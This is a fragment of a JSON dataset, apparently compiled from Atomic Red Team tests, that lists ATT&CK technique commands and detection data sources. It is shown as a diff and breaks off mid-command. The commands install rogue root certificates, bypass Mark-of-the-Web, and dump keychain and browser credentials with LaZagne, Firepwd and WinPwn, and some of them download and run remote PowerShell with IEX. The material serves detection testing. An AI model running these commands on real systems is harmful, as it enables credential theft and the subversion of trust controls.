+ "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify the certificate exists. It generates if not on disk.\n", + "prereq_command": "if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\n" + } + ], + "executor": { + "command": "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"#{cert_filename}\"\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Install root CA on Windows", + "auto_generated_guid": "76f49d86-5eb1-461a-a032-a480f86652f1", + "description": "Creates a root CA with Powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "pfx_path": { + "description": "Path of the certificate", + "type": "Path", + "default": "rootCA.cer" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Verify the certificate exists. It generates if not on disk.\n", + "prereq_command": "if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My\nExport-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath #{pfx_path}\nGet-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) | Remove-Item\n" + } + ], + "executor": { + "command": "$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", + "cleanup_command": "try {\n $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\\LocalMachine\\My -ErrorAction Ignore\n Get-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\n Get-ChildItem Cert:\\LocalMachine\\Root\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\n}\ncatch { }\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Install root CA on Windows with certutil", + "auto_generated_guid": "5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f", + "description": "Creates a root CA with certutil\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "pfx_path": { + "description": "Path of the certificate", + "type": "Path", + "default": "$env:Temp\\rootCA2.cer" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Certificate must exist at specified location (#{pfx_path})\n", + "prereq_command": "if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My\nExport-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath #{pfx_path}\nGet-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) | Remove-Item\n" + } + ], + "executor": { + "command": "certutil -addstore my #{pfx_path}\n", + "cleanup_command": "try {\n$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\\LocalMachine\\My\nGet-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\nGet-ChildItem Cert:\\LocalMachine\\Root\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\n} catch { }\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Add Root Certificate to CurrentUser Certificate Store", + "auto_generated_guid": "ca20a3f1-42b5-4e21-ad3f-1049199ec2e0", + "description": "The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.\nKeys will look like - \\SystemCertificates\\CA\\Certificates or \\SystemCertificates\\Root\\Certificates\nReference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \n", + "cleanup_command": "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1553.005", + "command_list": [ + "Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\T1553.005.iso\"\n", + "$keep = Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\FeelTheBurn.iso\" -StorageType ISO -Access ReadOnly\n$driveLetter = ($keep | Get-Volume).DriveLetter\ninvoke-item \"$($driveLetter):\\hello.exe\"\n", + "Unblock-File -Path #{file_path}\n", + "Unblock-File -Path $env:tmp\\ReadMe.md\n" + ], + "commands": [ + { + "command": "Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\T1553.005.iso\"\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + }, + { + "command": "$keep = Mount-DiskImage -ImagePath \"PathToAtomicsFolder\\T1553.005\\bin\\FeelTheBurn.iso\" -StorageType ISO -Access ReadOnly\n$driveLetter = ($keep | Get-Volume).DriveLetter\ninvoke-item \"$($driveLetter):\\hello.exe\"\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + }, + { + "command": "Unblock-File -Path #{file_path}\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + }, + { + "command": "Unblock-File -Path $env:tmp\\ReadMe.md\n", + "source": "atomics/T1553.005/T1553.005.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Mark-of-the-Web Bypass" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1553.005", + "display_name": "Subvert Trust Controls: Mark-of-the-Web Bypass", + "atomic_tests": [ + { + "name": "Mount ISO image", + "auto_generated_guid": "002cca30-4778-4891-878a-aaffcfa502fa", + "description": "Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path_of_iso": { + "description": "Path to ISO file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1553.005\\bin\\T1553.005.iso" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1553.005.iso must exist on disk at specified location (#{path_of_iso})\n", + "prereq_command": "if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile \"#{path_of_iso}\"\n" + } + ], + "executor": { + "command": "Mount-DiskImage -ImagePath \"#{path_of_iso}\"\n", + "cleanup_command": "Dismount-DiskImage -ImagePath \"#{path_of_iso}\" | Out-Null\n", + "name": "powershell" + } + }, + { + "name": "Mount an ISO image and run executable from the ISO", + "auto_generated_guid": "42f22b00-0242-4afc-a61b-0da05041f9cc", + "description": "Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. \nUpon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing \"Hello, World!\". \nISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, ", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path_of_iso": { + "description": "Path to ISO file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1553.005\\bin\\FeelTheBurn.iso" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})\n", + "prereq_command": "if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile \"#{path_of_iso}\"\n" + } + ], + "executor": { + "command": "$keep = Mount-DiskImage -ImagePath \"#{path_of_iso}\" -StorageType ISO -Access ReadOnly\n$driveLetter = ($keep | Get-Volume).DriveLetter\ninvoke-item \"$($driveLetter):\\hello.exe\"\n", + "cleanup_command": "Dismount-DiskImage -ImagePath \"#{path_of_iso}\" | Out-Null\nStop-process -name \"hello\" -Force -ErrorAction ignore\n", + "name": "powershell" + } + }, + { + "name": "Remove the Zone.Identifier alternate data stream", + "auto_generated_guid": "64b12afc-18b8-4d3f-9eab-7f6cae7c73f9", + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.\nRemoving this allows more freedom in executing scripts in PowerShell and avoids opening files in protected view.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_to_download": { + "description": "File that will be downloaded to test against.", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/README.md" + }, + "file_path": { + "description": "File to have the Zone.Identifier removed.", + "type": "String", + "default": "$env:tmp\\ReadMe.md" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "A test file with the Zone.Identifier attribute must be present.", + "prereq_command": "if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 }\n", + "get_prereq_command": "Invoke-WebRequest #{file_to_download} -OutFile #{file_path}\nSet-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'\n" + } + ], + "executor": { + "command": "Unblock-File -Path #{file_path}\n", + "cleanup_command": "Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1555.001", + "command_list": [ + "security -h\nsecurity find-certificate -a -p > /tmp/certs.pem\nsecurity import /tmp/certs.pem -k\n" + ], + "commands": [ + { + "command": "security -h\nsecurity find-certificate -a -p > /tmp/certs.pem\nsecurity import /tmp/certs.pem -k\n", + "source": "atomics/T1555.001/T1555.001.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Keychain" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1555.001", + "display_name": "Credentials from Password Stores: Keychain", + "atomic_tests": [ + { + "name": "Keychain", + "auto_generated_guid": "1864fdec-ff86-4452-8c30-f12507582a93", + "description": "### Keychain Files\n\n ~/Library/Keychains/\n\n /Library/Keychains/\n\n /Network/Library/Keychains/\n\n [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)\n\n [Keychain dumper](https://github.com/juuso/keychaindump)\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "cert_export": { + "description": "Specify the path of the certificates to export.", + "type": "Path", + "default": "/tmp/certs.pem" + } + }, + "executor": { + "command": "security -h\nsecurity find-certificate -a -p > #{cert_export}\nsecurity import #{cert_export} -k\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1555.003", + "command_list": [ + "Set-Location -path \"$env:TEMP\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", + "cd ~/Library/Cookies\ngrep -q \"coinbase\" \"Cookies.binarycookies\"\n", + "PathToAtomicsFolder\\T1555.003\\bin\\LaZagne.exe browsers\n", + "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination $env:temp\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination $env:temp\n", + "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination $env:temp\n", + "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination $env:temp -Force -Recurse\n", + "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination $env:temp\\Edge -Force -Recurse\n", + "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c $env:temp\\Firepwd.py -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > $env:temp\\T1555.003Test8.txt\ncat $env:temp\\T1555.003Test8.txt\n", + "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "python3 /tmp/LaZagne/Linux/laZagne.py #{specific_module} >> #{output_file}", + "python3 #{lazagne_path}/laZagne.py browsers -firefox >> #{output_file}", + "python3 #{lazagne_path}/laZagne.py #{specific_module} >> /tmp/firefox_password.txt", + "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\") {} else {new-item -path \"$env:temp\" -Name \"T1555.003\" -ItemType \"directory\" -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\" -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\" -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data\"} else {}\nif (test-path \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\") {copy-item \"$env:localappdata\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -destination \"$exfil_folder\\T1555.003Chrome_Login Data For Account\"} else {}\nif (test-path \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\") {copy-item \"$env:appdata\\Opera Software\\Opera Stable\\Login Data\" -destination \"$exfil_folder\\T1555.003Opera_Login Data\"} else {}\nif (test-path \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\") {copy-item \"$env:localappdata/Microsoft/Edge/User Data/Default/Login Data\" -destination \"$exfil_folder\\T1555.003Edge_Login Data\"} else {} \ncompress-archive -path \"$exfil_folder\" -destinationpath \"$exfil_folder.zip\" -force\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nbrowserpwn -consoleoutput -noninteractive", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nkittenz -consoleoutput -noninteractive", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')\nInvoke-Sharpweb -command \"all\"", + "cp ~/Library/\"Application Support/Google/Chrome/Default/Login Data\" \"/tmp/T1555.003_Login Data\"\ncp ~/Library/\"Application Support/Google/Chrome/Default/Login Data For Account\" \"/tmp/T1555.003_Login Data For Account\"\n" + ], + "commands": [ + { + "command": "Set-Location -path \"$env:TEMP\\Sysinternals\";\n./accesschk.exe -accepteula .;\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "cd ~/Library/Cookies\ngrep -q \"coinbase\" \"Cookies.binarycookies\"\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "PathToAtomicsFolder\\T1555.003\\bin\\LaZagne.exe browsers\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" -Destination $env:temp\nCopy-Item \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data For Account\" -Destination $env:temp\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:APPDATA\\Opera Software\\Opera Stable\\Login Data\" -Destination $env:temp\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\\" -Destination $env:temp -Force -Recurse\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "Copy-Item \"$env:LOCALAPPDATA\\Microsoft\\Edge\\User Data\\Default\" -Destination $env:temp\\Edge -Force -Recurse\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c $env:temp\\Firepwd.py -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > $env:temp\\T1555.003Test8.txt\ncat $env:temp\\T1555.003Test8.txt\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$PasswordDBLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\ncmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}\ncat #{Out_Filepath}\n", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "python3 /tmp/LaZagne/Linux/laZagne.py #{specific_module} >> #{output_file}", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "python3 #{lazagne_path}/laZagne.py browsers -firefox >> #{output_file}", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "python3 #{lazagne_path}/laZagne.py #{specific_module} >> /tmp/firefox_password.txt", + "source": "atomics/T1555.003/T1555.003.yaml", + "name": "Atomic Red Team Test - Credentials from Password Stores: Credentials from Web Browsers" + }, + { + "command": "$exfil_folder = \"$env:temp\\T1555.003\"\nif (test-path \"$exfil_folder\") {} else {new-item -path \"$env:temp\" -Name \"T1555.003\" -ItemType \"directory\" -force}\n$FirefoxCredsLocation = get-childitem -path \"$env:appdata\\Mozilla\\Firefox\\Profiles\\*.default-release\\\"\nif (test-path \"$FirefoxCredsLocation\\key4.db\") {copy-item \"$FirefoxCredsLocation\\key4.db\" -destination \"$exfil_folder\\T1555.003Firefox_key4.db\"} else {}\nif (test-path \"$FirefoxCredsLocation\\logins.json\") {copy-item \"$FirefoxCredsLocation\\logins.json\" -destination \"$exfil_folder\\T1555.003Firefox_logins.json\"} else {}\nif (test-path 